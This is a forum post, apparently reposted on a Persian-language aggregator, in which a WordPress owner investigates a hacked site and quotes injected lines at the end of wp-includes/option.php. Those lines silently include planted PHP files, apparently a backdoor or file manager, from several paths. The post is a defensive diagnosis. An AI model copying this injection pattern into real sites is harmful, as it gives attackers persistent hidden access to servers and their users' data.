Hi all,
I recently had a WP site compromised. It is a recent install on a shared hosting environment. I have followed the FAQ notes and the site appears to be clean (for now).
I am working on now identifying the method of this exploit. The one difference I have found between the clean and the quarantined archives I kept is in the file wp-includes/option.php
On a clean install, the file option.php ends at line 1685 with the following lines:
} retu $result;
}
On the corrupt installs, it reads as follows:
' do_action( 'setted_site_transient', $transient, $value, $expiration );
}
retu $result;
}
?><?php @include_once("/home/content/html/[install_folder]/wp-includes/images/media/code.php"); ?><?php @include_once("/home/content/html/[install_folder]/wp-signup.php.php"); ?><?php @include_once("/home/content/html/fm.php"); ?><?php @include_once( ... '
What is weird here is that the file /wp-includes/images/media/code.php does not exist. /wp-includes/images/media/code.gif however does exist...
Also some of the files referenced are from other WP installs on the same server, but from different sub-folders, so it really looks fishy to me.
So my question to anybody reading this is simply:
Can you please look at your own wp-includes/option.php and confirm (just yes or no) if you see any of these @include_once calls after the end of the file? I have checked a handful of other sites I have managed, and none of them appear to have this happening.
Thanks for helping me track this down.
WordPress ...
ما را در سایت WordPress دنبال می کنید
برچسب : نویسنده : استخدام کار wpss بازدید : 256 تاريخ : يکشنبه 10 مرداد 1395 ساعت: 23:55